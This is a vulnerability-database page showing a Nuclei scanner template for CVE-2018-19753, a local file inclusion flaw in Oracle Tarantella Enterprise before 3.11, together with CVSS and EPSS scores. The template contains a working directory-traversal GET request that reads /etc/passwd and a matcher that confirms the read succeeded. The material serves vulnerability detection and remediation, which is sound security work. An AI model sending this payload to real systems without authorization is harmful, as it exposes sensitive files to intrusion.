Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-19753
HistoryDec 01, 2021 - 2:20 a.m.

Tarantella Enterprise <3.11 - Local File Inclusion

2021-12-0102:20:05
ProjectDiscovery
github.com
11
tarantella
enterprise
local file inclusion
oracle
vulnerability
directory traversal
cve-2018-19753
packetstorm
seclists

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.007

Percentile

79.7%

Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
id: CVE-2018-19753

info:
  name: Tarantella Enterprise <3.11 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.
  remediation: |
    Upgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19753
    - http://seclists.org/fulldisclosure/2018/Nov/66
    - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-19753
    cwe-id: CWE-22
    epss-score: 0.0066
    epss-percentile: 0.79557
    cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: tarantella_enterprise
  tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle

http:
  - method: GET
    path:
      - "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c8023778b8d9d0e2a4b1e77c7200d3ecab62642b04c19419876641d5065ad736022100a7d6988ea608d6df29fba1b12d6b37f695f46be24d54be889f7b785d5b0a331e:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.007

Percentile

79.7%

Related for NUCLEI:CVE-2018-19753